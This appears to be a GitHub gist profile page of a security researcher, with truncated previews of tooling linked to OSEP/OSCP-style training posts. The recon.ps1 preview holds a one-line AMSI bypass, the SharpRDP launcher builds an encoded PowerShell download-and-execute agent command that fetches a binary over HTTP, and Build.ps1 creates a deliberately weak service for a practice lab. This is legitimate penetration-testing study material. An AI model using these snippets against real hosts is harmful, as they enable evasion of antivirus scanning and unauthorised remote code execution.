Taha DRAIDIA tahadraidia
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| DWORD __fastcall sub_140006190() // renamed to golden_function | |
| ... | |
| v12 = sub_140007980(); // Get handle info | |
| if ( v12 ) | |
| { | |
| logger_0(L"Error obtaining handle information: "); | |
| if ( v12 == -1073741790 ) | |
| { | |
| logger_0(L"Access denied\n\n"); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| uint32_t get_sip(void) { | |
| const char *sip_path = "/usr/lib/libSystem.dylib"; | |
| const char *sip_function = "csr_get_active_config"; | |
| void *libSystem = dlopen(sip_path, RTLD_LAZY); | |
| if (!libSystem) { | |
| printf("get_sip: Error loading libSystem.dylib\n"); | |
| return -1; | |
| }; |
tahadraidia
/ Microsoft.Powershell_profile.ps1
Created
January 10, 2022 11:04
Visual Studio Developer PowerShell Alias
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Function RunDevShell { | |
| Import-Module "C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\Tools\Microsoft.VisualStudio.DevShell.dll"; | |
| Enter-VsDevShell ba5e788f -StartInPath $PWD | |
| } | |
| Set-Alias -Name DevShell -Value RunDevShell |
tahadraidia
/ seh.asm
Last active
December 23, 2021 11:39
Tiny ASM program that access ExceptionList and print some pointers out as educational purpose, with the idea to understand better SEH implementation in X86. This code was written along with this blog post: https://tahadraidia.com/posts/a_brief_dive_into_windows_structured_exception_handeling/
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| format PE console 4.0 | |
| include 'win32ax.inc' | |
| section '.text' code readable executable | |
| entry start | |
| macro PrintPointer reg,string | |
| { |
tahadraidia
/ recon.ps1
Last active
July 12, 2022 17:20
This script is part of PEN300 MSF script, this script could be represented as recon script bundle, for more details please see: https://tahadraidia.com/posts/automate-the-reconnaissance-phase/ #OSEP #PEN300 #Powershell #DOTNET
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Patch API | |
| $a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like "*iUtils") {$c=$b}};$d=$c.GetFields('NonPublic,Static');Foreach($e in $d) {if ($e.Name -like "*Context") {$f=$e}};$g=$f.GetValue($null);[IntPtr]$ptr=$g;[Int33[]]$buf = @(0);[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $ptr, 1) | |
| # Check if current user has permissions | |
| # to write in C:\Windows\Tasks otherwise | |
| # use public. | |
| $Folder = "C:\Windows\Tasks" | |
| $global:recondir = "" | |
| $permission = (Get-Acl $Folder).Access | ?{$_.IdentityReference -match $env:USERNAME} | Select IdentityReference,FileSystemRights | |
| If ($permission){ |
tahadraidia
/ lpeprintbug.cs
Last active
December 1, 2021 06:09
Taking advantage of Assembly.GetManifestResourceStream for quick dirt hacks, for more details please read: https://tahadraidia.com/posts/taking-advantage-of-assembly.getmanifestresourcestream-for-quick-dirt-hacks/ #OSEP #CSHARP #DOTNET
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Diagnostics; | |
| using System.IO; | |
| using System.Net; | |
| using System.Runtime.InteropServices; | |
| using System.Security.Principal; | |
| using System.Threading; | |
| using System.Collections.Generic; | |
| using System.Text.RegularExpressions; |
tahadraidia
/ SharpRDPAgentLancher.ps1
Created
November 30, 2021 14:44
The following script is an the adaptation of the initial script: https://tahadraidia.com/posts/make-sharprdp-an-assembly-loadable/ #OSEP #CSHARP #POWERSHELL
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Invoke-PowershellAgent { | |
| [CmdletBinding()] | |
| param ( | |
| [Parameter(Mandatory=$true)][string]$computer, | |
| [Parameter(Mandatory=$true)][string]$username, | |
| [Parameter(Mandatory=$true)][string]$password | |
| ) | |
| $download_exec_agent = "C:\windows\system32\cmd.exe /c powershell -bypass exec -enc POWERSHELL_B64_AGENT" | |
| $asm = Invoke-WebRequest -URI 'http://127.0.0.1/SharpRDP.exe' -UseBasicParsing | Select-Object -ExpandProperty Content |
tahadraidia
/ Build.ps1
Created
November 26, 2021 09:09
Quick Powershell script to build some vulnerable Windows environment could be useful to prepare for OSCP, OSEP. Please see: https://tahadraidia.com/posts/build-an-atomic-windows-lab/
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function CreateVulnerableService { | |
| $params = @{ | |
| Name = "P0wnMe" | |
| BinaryPathName = "C:\foobar.exe" | |
| } | |
| New-Service @params -ErrorAction SilentlyContinue | |
| sc.exe sdset P0wnMe "D:(A;;CCLCSWLORCRPDTCRWDWOWPDCSD;;;AU)" | |
| } | |
| function RemoveVulnerableService { |
tahadraidia
/ pevalidator.c
Last active
September 14, 2021 08:18
A Python module written in C that checks if a file is a valid PE using Windows API used to illustrate the idea on how to write a Python module in C because Hello words' are boring! Post: https://tahadraidia.com/lets-build-a-python-module-in-c.html
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <Python.h> | |
| #include <windows.h> | |
| #pragma comment(lib,"kernel32.lib") | |
| static PyObject* isValidPE(PyObject *self, PyObject* args) | |
| { | |
| LPSTR pfile = NULL; | |
| if(!PyArg_ParseTuple(args, "s", &pfile)) |